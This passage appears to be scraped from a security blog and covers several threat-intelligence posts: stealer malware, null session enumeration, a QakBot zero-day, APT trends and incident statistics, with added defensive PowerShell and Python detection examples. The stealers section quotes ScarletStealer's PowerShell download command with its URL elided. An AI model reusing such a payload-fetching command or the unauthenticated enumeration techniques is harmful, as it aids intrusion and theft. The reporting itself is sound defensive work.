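Run it from an elevated PowerShell session. A volume reported with `HasRecoveryPassword` false is one you could not recover even with the secure strings the article describes; once a recovery password protector exists, `Backup-BitLockerKeyProtector` escrows it to Active Directory. The script only reads state; it does not add or remove protectors.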

If you need assistance with investigation of a ransomware attack and recovering encrypted data, please contact us at [email protected].


Our incident response and malware analysis are evidence that attackers are constantly refining their tactics to evade detection. In this incident, we observed the abuse of the native BitLocker feature for unauthorized data encryption. The VBS script demonstrates that the malicious actor involved in this attack has an excellent understanding of Windows internals. Although the script analysis was not complicated at all, this kind of threat is difficult to detect, since unique strings inside the artifact can be easily modified to bypass YARA rules. Therefore, the best detection method in scenarios like these is behavioral analysis, which correlates different actions performed by the application to reach a verdict.

Kaspersky products detect the threat described in this article with the following verdicts:

  • Trojan.VBS.SAgent.gen;
  • Trojan-Ransom.VBS.BitLock.gen;
  • Trojan.Win32.Generic.

Indicators of compromise


E-mail addresses:

MD5 hashes:

A journey into forgotten Null Session and MS-RPC interfaces

23 Květen, 2024 - 11:00

A journey into forgotten Null Session and MS-RPC interfaces (PDF)

It has been almost 24 years since the null session vulnerability was discovered. Back then, it was possible to access SMB named pipes using empty credentials and collect domain information. Most often, attackers leveraged null sessions for gathering domain users through techniques such as RID (Relative Identifier) enumeration. RIDs uniquely identify users, groups, computers and other entities within the domain. To enumerate them, the attacker used MS-RPC interfaces to make some calls and collect information from the remote host.

To prevent such attacks, Microsoft restricted null session capabilities by limiting what an attacker can do after connecting to named pipes, and provided security policies that could be implemented to stop all null session activities. Today, although null sessions still exist and are enabled by default on domain controllers (most likely for compatibility purposes), most system administrators close this capability by hardening the security policies and monitoring domain controller activities, including anonymous access through SMB.

As penetration testers, we always pose the question: is it really as secure as it seems? In this case we asked if we can bypass policies and restrictions today, after 24 years, and bring the idea of anonymous access back to life. This research is tailored for security researchers and penetration testers seeking to enhance their understanding of MS-RPC interfaces and refine their research techniques. It’s important to note that all information in this article is intended for legitimate security research purposes only, and must not be used for illegal activities.

The research is divided into two parts. In this post we share the first part, devoted to the research methodology against MS-RPC interfaces, developed after observing some interesting behavior from one of the Windows interfaces. Also included is a discussion of how we can link this behavior to null sessions, and revive their legacy by enumerating information from the domain controller, specifically domain users without triggering any alerts.

About null session

Null sessions have emerged as a pivotal area of interest and concern within the field of cybersecurity. They occur when access to a network resource, most commonly the IPC$ “Windows Named Pipe” share, is granted with empty credentials. IPC$ (Inter-Process Communication) is a hidden share that processes on different computers use to communicate with each other. After obtaining anonymous access to this resource, an attacker can bind an MS-RPC interface exposed by a particular named pipe inside the IPC$ share, and start to gather information such as shares, users, groups, registry keys and much more.

In newer Windows versions, the null session capability has become more restricted, and is available only on Windows servers that act as domain controllers. When you promote your server to a domain controller, null session access to the following named pipes is available by default:

  • “\pipe\netlogon”;
  • “\pipe\samr”;
  • “\pipe\lsarpc”.

To prevent null sessions, two related system policies were introduced: “Restrict anonymous access to Named Pipes and Shares” and “Network access: Named Pipes that can be accessed anonymously.” The first policy, “Restrict anonymous access to Named Pipes and Shares,” is enabled by default. The second policy, “Network access: Named Pipes that can be accessed anonymously,” contains the three named pipes we discussed earlier (netlogon, samr, and lsarpc). To prevent any action related to null sessions, the latter policy is set to empty so that these named pipes can no longer be accessed anonymously.
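As an added example (not part of the article or its accompanying tool), the script below audits the two policies just described by reading the registry values they are stored in: “Restrict anonymous access to Named Pipes and Shares” maps to `RestrictNullSessAccess`, and “Network access: Named Pipes that can be accessed anonymously” maps to the `NullSessionPipes` multi-string, both under the LanmanServer parameters key. It assumes local administrator rights on the domain controller being checked; the function names and the treatment of a missing `RestrictNullSessAccess` value as “enabled” (the default the article mentions) are my own.

```powershell
# Added example (not from the article): audit null session policy state on a host.
# Assumes administrator rights; reads registry only, changes nothing.

$LanmanParams   = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters'
$DefaultDcPipes = @('netlogon', 'samr', 'lsarpc')   # exposed anonymously by default on DCs (per the article)

function Get-NullSessionPolicy {
    $p = Get-ItemProperty -Path $LanmanParams -ErrorAction Stop

    # "Restrict anonymous access to Named Pipes and Shares" -> RestrictNullSessAccess (1 = enabled).
    # Assumption: a missing value is treated as the enabled default.
    $restrict = if ($null -ne $p.RestrictNullSessAccess) { [int]$p.RestrictNullSessAccess } else { 1 }

    # "Network access: Named Pipes that can be accessed anonymously" -> NullSessionPipes (REG_MULTI_SZ).
    $pipes = @($p.NullSessionPipes | Where-Object { $_ -and $_.Trim() })

    [pscustomobject]@{
        RestrictNullSessAccess = $restrict
        NullSessionPipes       = $pipes
        AnonymousPipesOpen     = ($pipes.Count -gt 0)
        DefaultDcPipesExposed  = @($pipes | Where-Object { $DefaultDcPipes -contains $_.ToLower() })
    }
}

function Test-NullSessionHardened {
    # Hardened means the restriction is on and the anonymous pipe list is empty,
    # which is exactly the configuration the article recommends.
    $policy = Get-NullSessionPolicy
    return ($policy.RestrictNullSessAccess -eq 1 -and -not $policy.AnonymousPipesOpen)
}

$policy = Get-NullSessionPolicy
$policy | Format-List

if (Test-NullSessionHardened) {
    'Null session access to named pipes is closed on this host.'
} else {
    Write-Warning ('Named pipes still reachable anonymously: {0}' -f ($policy.NullSessionPipes -join ', '))
}
```

Running it on a freshly promoted domain controller should list the three default pipes; after the policy is emptied through Group Policy, `NullSessionPipes` comes back empty. Note the scope: this audits only the SMB named-pipe policies, and says nothing about the DCOM endpoint on TCP port 135 that the article goes on to discuss, which these policies do not govern.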

Enumerating network interfaces without authentication

During my work in traffic analysis, I noticed many packets related to DCOM communications between domain controller and other endpoints, which were tagged by Wireshark under the IOXIDResolver RPC interface and the ServerAlive2() method. The IOXIDResolver interface is actually the IObjectExporter interface. As Microsoft mentions, it is used for OXID resolution, pinging and server aliveness tests. In brief, it helps in the process of locating and connecting to remote objects involved in resolving OXID references to actual network locations (such as IP addresses) of objects in a DCOM environment.

One of the IObjectExporter methods is ServerAlive2. The ServerAlive2 (OPNUM 5) method was introduced with version 5.6 of the DCOM Remote Protocol, and extends the ServerAlive method. It returns string and security bindings for the object resolver, which allows the client to choose the most appropriate settings, compatible with both client and server. The IObjectExporter interface uses TCP port 135 as an MS-RPC endpoint.

In the traffic for each TCP stream related to DCOM communication, there were four packets. The first is related to binding the IObjectExporter interface, the second to the server binding response, the third to the ServerAlive2 function call, and the final packet is the response for the ServerAlive2 function, which contains all the network interfaces for the domain controller.

Bind request packet

The image above shows a bind request for IObjectExporter interface. You can see that the Auth Length header is equal to zero, indicating that the authentication level is None, and hence, there is no authentication. With just two packets from the client, we can enumerate network interfaces for the remote host without authentication.

The idea struck me: what if there are other RPC interfaces vulnerable to no authentication? What kind of enumeration could be obtained from them? Can we map it to the famous null session? And what research strategy should I follow to find this out? In the full version of the research (PDF), I try to answer these questions, discuss a new path for enumerating domain information, and share a tool that implements the idea of this new path.

Stealers, stealers and more stealers

22 Květen, 2024 - 12:00


Stealers are a prominent threat in the malware landscape. Over the past year we published our research into several stealers (see here, here and here), and for now, the trend seems to persist. In the past months, we wrote several private reports on stealers as we discovered Acrid (a new stealer), ScarletStealer (another new stealer) and Sys01, which had been updated quite a bit since the previous public analysis.

To learn more about our crimeware reporting service, you can contact us at [email protected].


Acrid is a new stealer found last December. Despite the name, it has nothing in common with the AcridRain stealer. Acrid is written in C++ for 32-bit systems, despite the fact that most systems are 64-bit these days. Upon closer inspection of the malware, the reason for compiling for a 32-bit environment became clear: the author decided to use the “Heaven’s Gate” technique. This allows 32-bit applications to access the 64-bit space to bypass certain security controls.

“Heaven’s Gate” technique implementation in Acrid stealer

In terms of functionality, the malware embeds the typical functionality one might expect from a stealer:

  • Stealing browser data (cookies, passwords, login data, credit card information, etc.);
  • Stealing local cryptocurrency wallets;
  • Stealing files with specific names (e.g. wallet.dat, password.docx, etc.);
  • Stealing credentials from installed applications (FTP managers, messengers, etc.).

Collected data is zipped and sent to the C2.

The malware is of medium sophistication. It has a certain degree of complexity, such as string encryption, but lacks any innovative features.


Last January, we analyzed a downloader we dubbed “Penguish”, which we described in detail in a private report. One of the payloads it downloaded was a previously unknown stealer we call “ScarletStealer”.

ScarletStealer is a rather odd stealer as most of its stealing functionality is contained in other binaries (applications and Chrome extensions) that it downloads. To be more precise, when ScarletStealer is executed, it checks for the presence of cryptocurrencies and crypto wallets by checking certain folder paths (e.g. %APPDATA%\Roaming\Exodus). If anything is detected, it starts to download the additional executables using the following PowerShell command:

powershell.exe -Command "Invoke-WebRequest -Uri 'https://.........exe' -OutFile $env:APPDATA\\.........exe"

Among the binaries it downloads are metaver_.exe (used to steal content from Chrome extensions), meta.exe (modifies the Chrome shortcut, so the browser is launched with a malicious extension), and others. Most of the ScarletStealer executables are digitally signed.

Metamask grabbing function

The stealer is very underdeveloped in terms of functionality and contains many errors, flaws and redundant code. For example, the malware tries to gain persistence on the system by creating a registry key for autorun. The registry key contains the path to the file Runtimebroker_.exe, but we did not find any code in any of the files involved in the infection that would store at least one executable file with that name.

Therefore, it is rather odd that this stealer is distributed through a long chain of downloaders, where the last one is the Penguish downloader, and signed with a digital certificate. One would expect that all this effort would result in a more advanced stealer than ScarletStealer.

ScarletStealer victims are mostly located in Brazil, Turkey, Indonesia, Algeria, Egypt, India, Vietnam, the USA, South Africa and Portugal.


SYS01 (also known as “Album Stealer” or “S1deload Stealer”) is a relatively unknown stealer that has been around since at least 2022. It has been described by Bitdefender, Zscaler and Morphisec. In their reports, you can follow its evolution from a C# stealer to a PHP stealer. When we started to look into this campaign we noticed a combination of the two, a C# and PHP payload.

One thing that has not changed is the infection vector. Users are still tricked into downloading a malicious ZIP archive disguised as an adult video via a Facebook page:

Ad for the malicious ZIP archive on a compromised Facebook page

The archive contains a legitimate binary — in this case WdSyncservice.exe, renamed to PlayVideoFull.exe — that sideloads a malicious DLL named WDSync.dll. The DLL opens an adult-themed video and executes the next payload, which is a malicious PHP file encoded with ionCube.

The executed PHP file calls a script, install.bat, which ultimately runs the next stage by executing a PowerShell command. This layer is conveniently named runalayer and runs what seems to be the final payload called Newb.

There is, however, a difference between the latest version of the stealer and the previously disclosed versions: the functionality has been split. The stealer as it is now (Newb) contains functionality to steal Facebook-related data and to send stolen browser data, located and organized in a specific directory structure, to the C2. It also has backdoor functions, and it can execute the following commands, among others:

Command   Description
dll       Download a file, kill all the specified processes and start a new process using PowerShell (the command decrypts, unzips and executes the specified file). The PowerShell routine is similar to the routines observed earlier.
cmd       Kill a list of specified processes and start a new process.
dls       Download a file, kill all the specified processes and start a new specified process.

But the code that actually collects the browser data Newb sends to C2 was found in a different sample named imageclass. We were not able to determine with 100% certainty how imageclass was pushed to the system, but looking at the backdoor code of Newb, we concluded with a high degree of certainty that imageclass was later pushed through Newb to the infected machine.

The initial ZIP archive also contains another malicious PHP file: include.php. This file has similar backdoor functionality to Newb and accepts many of the same commands in the same format.

Victims of this campaign were found all over the world, but most of them were located in Algeria (a bit over 15%). This most likely has to do with the infection vector as it can be heavily localized. We also noticed that the malware authors have a preference for .top TLDs.


Stealers are a prominent threat that is here to stay. In this post, we have discussed an evolution of a known stealer, as well as two completely new stealers with different levels of complexity. The fact that new stealers appear every now and then, combined with the fact that their functionality and sophistication varies greatly, indicates that there is a criminal market demand for stealers.

The danger posed by stealers lies in the consequences. This malware steals passwords and other sensitive information, which later can be used for further malicious activities causing great financial losses among other things. To protect yourself against stealers and other threats, it is essential to follow a number of basic hygiene rules. Always update your software with the latest security patches, don’t download any files from dubious sources, don’t open attachments in suspicious emails, etc. Finally, if you want to be even more sure, a security solution, such as our SystemWatcher component, that looks at the behavior of events on your machine can help to protect your system as well.

If you would like to stay up to date on the latest TTPs being used by criminals, or if you have questions about our private reports, you can contact us at [email protected].

Indicators of compromise




QakBot attacks with Windows zero-day (CVE-2024-30051)

14 Květen, 2024 - 19:14

In early April 2024, we decided to take a closer look at the Windows DWM Core Library Elevation of Privilege Vulnerability CVE-2023-36033, which was previously discovered as a zero-day exploited in the wild. While searching for samples related to this exploit and attacks that used it, we found a curious document uploaded to VirusTotal on April 1, 2024. This document caught our attention because it had a rather descriptive file name, which indicated that it contained information about a vulnerability in Windows OS. Inside we found a brief description of a Windows Desktop Window Manager (DWM) vulnerability and how it could be exploited to gain system privileges, everything written in very broken English. The exploitation process described in this document was identical to that used in the previously mentioned zero-day exploit for CVE-2023-36033, but the vulnerability was different. Judging by the quality of the writing and the fact that the document was missing some important details about how to actually trigger the vulnerability, there was a high chance that the described vulnerability was completely made up or was present in code that could not be accessed or controlled by attackers. But we still decided to investigate it, and a quick check showed that this is a real zero-day vulnerability that can be used to escalate privileges. We promptly reported our findings to Microsoft, the vulnerability was designated CVE-2024-30051, and a patch was released on May 14, 2024, as part of Patch Tuesday.

After sending our findings to Microsoft, we began to closely monitor our statistics in search of exploits and attacks that exploit this zero-day vulnerability, and in mid-April we discovered an exploit for this zero-day vulnerability. We have seen it used together with QakBot and other malware, and believe that multiple threat actors have access to it.

We are going to publish technical details about CVE-2024-30051 once users have had time to update their Windows systems.

Kaspersky products detect the exploitation of CVE-2024-30051 and related malware with the verdicts:

  • PDM:Exploit.Win32.Generic;
  • PDM:Trojan.Win32.Generic;
  • UDS:DangerousObject.Multi.Generic;
  • Trojan.Win32.Agent.gen;
  • Trojan.Win32.CobaltStrike.gen.

Kaspersky would like to thank Microsoft for their prompt analysis of the report and patches.

Incident response analyst report 2023

14 Květen, 2024 - 13:00

Incident response analyst report 2023

As an information security company, our services include incident response and investigation, and malware analysis. Our customer base spans Russia, Europe, Asia, South and North America, Africa and the Middle East. Our annual Incident Response Report presents anonymized statistics on the cyberattacks we investigated in 2023. All data is derived from working with organizations that requested our expertise in carrying out incident response (IR) or assisting their in-house expert team.

Distribution of incidents by region and industry

The geography of the service has changed somewhat of late, with the share of requests in Russia and the CIS (47.27%) continuing to rise. At the same time, 2023 is notable for the significant increase in the number of IR requests in the second-place Americas region (21.82%).

Geographic distribution of IR requests, 2023

Looking at the distribution of incidents by industry, we see that in 2023 the majority of requests came from government agencies (27.89%) and industrial enterprises (17.01%).

Distribution of organizations that requested IR assistance, by industry, 2023

2023 trends: ransomware and supply chain attacks

In 2023, ransomware remained the most prevalent threat, despite a drop in share to 33.3%, down from 39.8% in 2022. Ransomware targeted organizations indiscriminately, regardless of industry. The most common families we came across in our investigations were LockBit (27.78%), BlackCat (12.96%), Phobos (9.26%) and Zeppelin (9.26%).

Another important trend we observed in 2023 was the significant rise in the number of attacks through trusted relationships with contractors and service providers. This attack vector was among the three most frequently seen in 2023. This is not surprising, for it allows threat actors to carry out large-scale attacks with a great deal more efficiency than if they targeted each victim individually. For many organizations such attacks can be devastating, and detecting them takes a lot longer because the attackers’ actions can be hard to distinguish from those of employees working for a contractor.

Report contents

The full report covers:

  • IR statistics: what events prompted organizations to request IR services, at what stages attacks were detected, how long it took on average to respond to them;
  • Common tactics, techniques and procedures employed by threat actors at different stages of attack development;
  • Legitimate tools used in attacks, with examples of their use in real-world incidents;
  • Vulnerabilities most often exploited by threat actors.

Recommendations for preventing cyberincidents

To reduce the risk of a successful cyberattack on your organization, or minimize the damage if attackers do penetrate your infrastructure, we recommend:

  • Enforcing a strict password policy and protecting key resources with multi-factor authentication;
  • Closing remote management ports to outside access;
  • Promptly updating software and deploying additional security measures for services at the network perimeter;
  • Cybersecurity awareness training and related activities for employees;
  • Restricting the use of legitimate tools that may be utilized for attacks on the corporate network, and creating rules for detecting such tools;
  • Conducting regular cyber drills focused on common attacker techniques;
  • Backing up data on a regular basis;
  • Protecting endpoints with EDR solutions;
  • Subscribing to an IR service guaranteed under an SLA.

Read the full 2023 Incident Response Report (PDF).

APT trends report Q1 2024

9 Květen, 2024 - 12:00

For more than six years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. These summaries are based on our threat intelligence research. They provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.

This is our latest installment, focusing on activities that we observed during Q1 2024.

Readers who would like to learn more about our intelligence reports or request more information about a specific report, are encouraged to contact [email protected].

The most remarkable findings

The Gelsemium group performs server-side exploitation that effectively leads to a webshell, and uses various custom and public tools deployed with stealth techniques and technologies. The two main implants, SessionManager and OwlProxy, were first detected in 2022 in the aftermath of the ProxyLogon-type exploitations of Exchange Servers. Our latest investigation was prompted by the discovery of suspicious activity on a server located in Palestine in mid-November 2023, with traces of a previous breach attempt on October 12, 2023. The payloads were distinctively served, veiled as font files, in compressed and encrypted fashion. This characteristic led us to highly similar incidents in Tajikistan and Kyrgyzstan.

Careto is a highly sophisticated threat actor that has been seen targeting various high-profile organizations since at least 2007. However, the last operations conducted by this threat actor were observed in 2013. Since then, no information about Careto’s activity has been published. Recent threat hunting enabled us to gain an insight into campaigns run by Careto in 2024, 2022 and 2019. Our private report provided a detailed description of these activities, focusing on how the actor performed the initial infections, lateral movement, malware execution, and data exfiltration activities. It is notable that the Careto actor used custom techniques, such as employing the MDaemon email server to maintain a foothold inside the organization or leveraging the HitmanPro Alert driver for persistence. In total, we have seen Careto use three complex implants for malicious activities, which we dubbed “FakeHMP”, “Careto2”, and “Goreto”. The capabilities of these implants were also described in our private report.

Middle East

In March, a new malware campaign was discovered, targeting government entities in the Middle East. We dubbed it “DuneQuixote”. Our investigation uncovered more than 30 DuneQuixote dropper samples actively employed in this campaign. The droppers are tampered-with installer files for a legitimate tool named “Total Commander”. These carry malicious code for downloading further payloads, at least some of which are backdoor samples dubbed “CR4T”. At the time of discovery, we identified only two such implants, yet we strongly suspect the existence of others that may come in the form of completely different malware. The group prioritized the prevention of collection and analysis of their implants: the DuneQuixote campaigns display practical and well-designed evasion methods, both in network communications and malware code.

Our last report on the Oilrig APT discussed how IT service providers were potentially used as a pivot point to reach their clients as an end-target, and we kept tracking the threat actor’s activity to identify relevant infection attempts. We detected another activity in the process, likely by the same threat actor, but this time targeting an internet service provider in the Middle East. This new activity saw the actor using a .NET-based implant, which is staged using VB and PowerShell. The implant, which we named “SKYCOOK” for its function names, is a remote command execution and infostealer utility. The actor also used an autohotkey-based (AHK) keylogger similar to the one used in a previous intrusion.

Southeast Asia and Korean Peninsula

We have been tracking the activities of DroppingElephant in the past few years and recently detected several samples of the Spyder backdoor in its operations, as well as the Remcos RAT and, in a smaller number of cases, other malicious RAT tools. We observed that the threat actor abuses the Discord CDN network and leverages malicious .DOC and .LNK files to deliver these remote access tools to victims in South Asia. The Spyder backdoor has been detailed by QiAnXin, along with its use in targeting multiple entities in South Asia. In our report, we shared newly discovered IoCs and the types of targeted organizations based on our telemetry.

At the end of 2023, we discovered a striking malware variant orchestrated by the Kimsuky group, delivered by exploiting legitimate software exclusive to South Korea. While the precise method used to manipulate this legitimate program as the initial infection vector remains unclear, we confirmed that the legitimate software established a connection to the attacker’s server. Subsequently, it retrieved a malicious file, thereby initiating the first stage of the malware.

The initial-stage malware serves as a conventional installer designed to introduce supplementary malware and establish a persistence mechanism. Upon execution, the installer generates a subsequent-stage loader and registers it as a Windows service for automatic execution. The culminating payload in this sequence is a previously unknown Golang-based malware dubbed “Durian”. Durian boasts comprehensive backdoor functionality, enabling the execution of delivered commands, additional file downloads and exfiltration of files.

With the help of Durian, the operator implemented various preliminary methods to sustain a connection with the victim. First, they introduced additional malware named “AppleSeed”, an HTTP-based backdoor commonly employed by the Kimsuky group. Furthermore, they incorporated legitimate tools, including ngrok and Chrome Remote Desktop, along with a custom proxy tool, to access target machines. Ultimately, the actor implanted the malware to pilfer browser-stored data including cookies and login credentials.

Based on our telemetry, we pinpointed two victims within the South Korean cryptocurrency sector. The first compromise occurred in August 2023, followed by a second in November 2023. Notably, our investigation did not uncover any additional victims during these instances, indicating a highly focused targeting approach by the actor.

Given that the actor exclusively employed the AppleSeed malware, a tool historically associated with the Kimsuky group, we have a high level of confidence in attributing these attacks to Kimsuky. However, intriguingly, we have detected a tenuous connection with the Andariel group. Andariel, known for adopting a custom proxy tool named “LazyLoad”, appears to share similarities with the actor in this attack, who also utilized LazyLoad, as observed during our research. This nuanced connection warrants further exploration into the potential collaboration or tactics shared between these two threat actors.

ViolentParody is a backdoor detected inside a South Korean gaming company, with the latest deployments observed in January this year. The threat actor distributed this backdoor over the organization’s network by infecting a batch file located on an internal network share. The execution of said infected .BAT file results in the launch of an MSI installer that in turn drops the backdoor on the machine and configures it to persist through scheduled tasks and COM objects. Analysis of this backdoor revealed that it could collect reconnaissance data on the infected machine, perform file system operations and inject various payloads. We additionally observed the threat actor behind this backdoor launching penetration testing tools, such as Ligolo-ng, Inveigh and Impacket. We attribute the activity described in our report to Winnti with low confidence.

The threat actor SideWinder launched hundreds of attacks in recent months against high-profile entities in Asia and Africa. Most of the attacks start with a spear-phishing email containing a Microsoft Word document or a ZIP archive with an LNK file inside. The attachment kicks off a chain of events that lead to the execution of multiple intermediate stages with different JavaScript and .NET loaders, and finally ends with a malicious implant developed in .NET that runs only in memory.

During the investigation, we observed a rather large infrastructure composed of many different virtual private servers and dozens of subdomains. Many subdomains are assumed to be created for specific victims, and the naming scheme indicated that the attacker had tried to disguise malicious communications as legitimate traffic from websites related to governmental entities or logistics companies.

SideWinder has historically targeted governmental and military entities in South Asia, but in this case, we observed an expanded range of targets. The actor also compromised victims located in Southeast Asia and Africa. Moreover, we saw different diplomatic entities in Europe, Asia and Africa that were compromised. The expansion in targeting also includes new industries, as shown by the discovery of new targets in the logistics sector, more specifically in maritime logistics.

The Lazarus group has various malware clusters in its arsenal and continues to update its functionalities and techniques to evade detection. However, the actor can also be observed employing its old malware on occasion. We recently discovered that this notorious actor was testing its old and familiar tool, ThreatNeedle. The malware author utilized a binder tool to create initial-stage malware for delivering and implanting the final payload. The main objective of the binder tool is assembling the malware installer, actual payload and configuration. In addition, we discovered various malicious files from an affected machine fetching the next-stage payload after sending the victim’s profile. This kind of downloader malware is typical of Lazarus’s modus operandi. However, the group adopted a more complex HTTP communication format at this time to evade detection at the network level. By investigating the Command-and-Control (C2) resources used by the actor, we discovered NPM packages that contain malicious JavaScript code to deliver malware without user notification. Most of them are disguised as cryptocurrency-related programs and capable of downloading an additional payload from the actor-controlled server. This is a highly similar strategy to the scheme that we have observed and reported in the past.


Hacktivism, a marriage of hacking and activism, is often excluded from a company’s threat profile. This type of threat actor is commonly active in all types of crises, conflicts, wars and protests, among other events. The goal is to send a political, social or ideological message using digital means.

SiegedSec stepped up its hacktivist intrusions and activities internationally throughout 2023. This small group, active since 2022, mainly performs hack-and-leak operations. As with past hacktivist groups like LulzSec, what started as hack-and-leak and disruptive operations “just for lulz”, evolved into multiple offensive efforts in pursuit of social justice-related goals across the globe. The activities also led to coordination with other cybercriminal groups as part of the Five Families hacktivist collective, although SiegedSec were later expelled for alleged improper conduct.

Their recent offensive activity is contingent on current socio-political events. Their web-application-focused offensive activity targets companies and industrial and government infrastructure, and they leak stolen sensitive information. SiegedSec’s social justice causes include demanding freedom for an arrested Colombian website defacer / hacker, opposition to anti-abortion laws instituted by U.S. state governments, the ongoing Israel-Hamas conflict and alleged human rights violations by NATO. The group’s members, both past and present, are still at large.

During the Israel-Hamas conflict, there has been an uptick in activities by hacktivists from all around the world, including denial of service (DoS and DDoS), web defacements, doxing and recycling of old leaks. The targets and victims have been primarily Israeli and Palestinian infrastructure. But since there are supporters on both sides of this conflict, hacktivists also target the infrastructure of supporting countries.

To mitigate exposure to threat actors of this type, it is first important to update the threat/risk profile when similar events happen. Second, it is vital to understand the technology exposure connected to the respective country or institution, and prevent unauthorized access by ensuring secure access and updated software. Third, DoS/DDoS readiness is essential. Although these attacks are transient, merely denying access for a limited time before normal service resumes, the respective tools are widely available, and their disruptive impact on business operation may vary depending on attack duration and size. Therefore, it is essential to implement measures to mitigate against application and volumetric attacks. Finally, data leaks are almost inevitable nowadays. Hackers may merely start with stolen credentials to gain full enterprise access and leak sensitive data. The data may then get recycled in future events, to associate the hot topic of compromise with the hacktivist message, so that it can be heard widely. The best approach to mitigate against this is to prevent the data leak in the first place. Implementing ways to monitor the network flow can be helpful in identifying an unusually large outbound data flow, which could be blocked at an early stage.
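The last mitigation above, watching network flow for an unusually large outbound transfer, is simple to prototype. The script below is an added example, not code from the Securelist post: it sums each internal host’s bytes to external addresses per hour and flags an hour that exceeds both an absolute floor and a multiple of the host’s own median for its other hours, so a steady 5 MB/hour host and a large internal-only backup do not alert. The CSV field names, the internal address ranges and the flow records are constructed assumptions for the example, not any collector’s real format.

```python
"""Added example (not code from the Securelist post): spot a host whose outbound
volume to external addresses jumps far above its own baseline. The flow records,
CSV field names and internal ranges are constructed assumptions for the example."""
from collections import defaultdict
from ipaddress import ip_address, ip_network
import csv
import io
import statistics

# Internal ranges are an assumption for the example; use your own address plan.
INTERNAL_NETS = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed sample, hourly buckets. 10.0.0.5 normally sends ~1 MB/hour out,
# then pushes 40 MB to a new external host in hour 3. 10.0.0.9 is a steady
# 5 MB/hour, plus a large internal-only backup that must not be flagged.
SAMPLE_FLOWS = """hour,src,dst,bytes
0,10.0.0.5,198.51.100.10,900000
1,10.0.0.5,198.51.100.10,1100000
2,10.0.0.5,198.51.100.10,950000
3,10.0.0.5,203.0.113.77,40000000
0,10.0.0.9,198.51.100.10,5000000
1,10.0.0.9,198.51.100.10,5200000
2,10.0.0.9,198.51.100.10,4800000
3,10.0.0.9,198.51.100.10,5100000
3,10.0.0.9,10.0.0.20,90000000
"""


def is_internal(addr):
    a = ip_address(addr)
    return any(a in net for net in INTERNAL_NETS)


def parse_flows(text):
    """Return (hour, src, dst, bytes) tuples from the CSV export."""
    return [(int(r["hour"]), r["src"], r["dst"], int(r["bytes"]))
            for r in csv.DictReader(io.StringIO(text))]


def outbound_per_host_hour(flows):
    """Sum bytes per (src, hour) for flows that actually leave the network."""
    totals = defaultdict(int)
    for hour, src, dst, nbytes in flows:
        if is_internal(src) and not is_internal(dst):
            totals[(src, hour)] += nbytes
    return totals


def find_exfil_candidates(flows, factor=10.0, min_bytes=10_000_000):
    """Return [(src, hour, bytes, baseline)] for hours where a host's outbound
    volume exceeds both `min_bytes` and `factor` x the median of its other hours.
    The absolute floor keeps quiet hosts from alerting on a few megabytes."""
    by_host = defaultdict(dict)
    for (src, hour), nbytes in outbound_per_host_hour(flows).items():
        by_host[src][hour] = nbytes
    hits = []
    for src, hours in by_host.items():
        for hour, nbytes in sorted(hours.items()):
            others = [v for h, v in hours.items() if h != hour]
            if not others:
                continue  # no baseline yet for a host seen in a single hour
            baseline = statistics.median(others)
            if nbytes >= min_bytes and nbytes > factor * baseline:
                hits.append((src, hour, nbytes, baseline))
    return hits


if __name__ == "__main__":
    for src, hour, nbytes, base in find_exfil_candidates(parse_flows(SAMPLE_FLOWS)):
        print(f"{src} hour {hour}: {nbytes:,} bytes out vs ~{base:,.0f}/hour baseline")
```

On the sample data only 10.0.0.5 in hour 3 is reported. In practice the baseline window would be days rather than hours, and a hit should be enriched with the destination (a first-seen external host, as here, is a much stronger signal than a known SaaS endpoint) before anyone blocks it.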

Other interesting discoveries

In 2020, we reported an ongoing campaign, started in 2019, that leveraged what was at the time new Android malware named “Spyrtacus”, used against individuals in Italy. The tool exhibited similarities with HelloSpy, the infamous stalkerware used to remotely monitor infected devices. The threat actor first started distributing the malicious APK via Google Play in 2018, but switched to malicious web pages forged to imitate legitimate resources relating to the most common Italian internet service providers in 2019. We have continued to monitor this threat over the years and recently observed a previously unknown Spyrtacus agent developed for Windows. The implant communicates with a C2 resource already reported in one of our previous reports and shares similarities to the Android counterpart in both malware logic and the communication protocol. During the investigation, we discovered other subdomains, which indicate the existence of implants for iOS and macOS, and may indicate the expansion of the group’s activities to other countries in Europe, Africa and the Middle East.

Final thoughts

While the TTPs of some threat actors remain consistent over time, such as heavy reliance on social engineering as a means of gaining a foothold in a target organization or compromising an individual’s device, others have refreshed their toolsets and expanded the scope of their activities. Our regular quarterly reviews are intended to highlight the most significant developments relating to APT groups.

Here are the main trends that we saw in Q1 2024:

  • The key highlights this quarter include Kimsuky’s use of the Golang-based backdoor Durian in a supply-chain attack in South Korea, and campaigns focused on the Middle East, including APTs such as Gelsemium, but also hacktivist attacks.
  • The Spyrtacus malware used for targeting individuals in Italy demonstrates that threat actors continue to develop for multiple platforms, including mobile malware.
  • APT campaigns continue to be very geographically dispersed. This quarter, we reported campaigns focused on Europe, the Americas, the Middle East, Asia and Africa.
  • We have seen attacks targeting a variety of sectors, including government, diplomatic, gaming, maritime logistics and an ISP.
  • Geopolitics remains a key driver of APT development, and cyberespionage remains a prime goal of APT campaigns.
  • We also continue to see hacktivist campaigns: these have been centered mainly around the Israel-Hamas conflict, but not exclusively, as the activities of SiegedSec illustrate.

As always, we would like to note that our reports are the product of our visibility into the threat landscape. However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.

Disclaimer: when referring to APT groups as Russian-speaking, Chinese-speaking or other-language-speaking, we refer to various artefacts used by the groups (such as malware debugging strings, comments found in scripts, etc.) containing words in these languages, based on the information that we obtained directly or that is otherwise publicly known and widely reported. The use of certain languages does not necessarily indicate a specific geographic relation, but rather points to the languages that the developers behind these APT artefacts use.

State of ransomware in 2024

8 Květen, 2024 - 12:00

Ransomware attacks continue to be one of the biggest contemporary cybersecurity threats, affecting organizations and individuals alike on a global scale. From high-profile breaches in healthcare and industrial sectors – compromising huge volumes of sensitive data or halting production entirely – to attacks on small businesses that have become relatively easy targets, ransomware actors are expanding their sphere of influence. As we approach International Anti-Ransomware Day, we have analyzed the major ransomware events and trends. In this report, we share our observations, research, and statistics to shed light on the evolving ransomware threat landscape and its implications for cybersecurity.

Ransomware landscape: rise in targeted groups and attacks

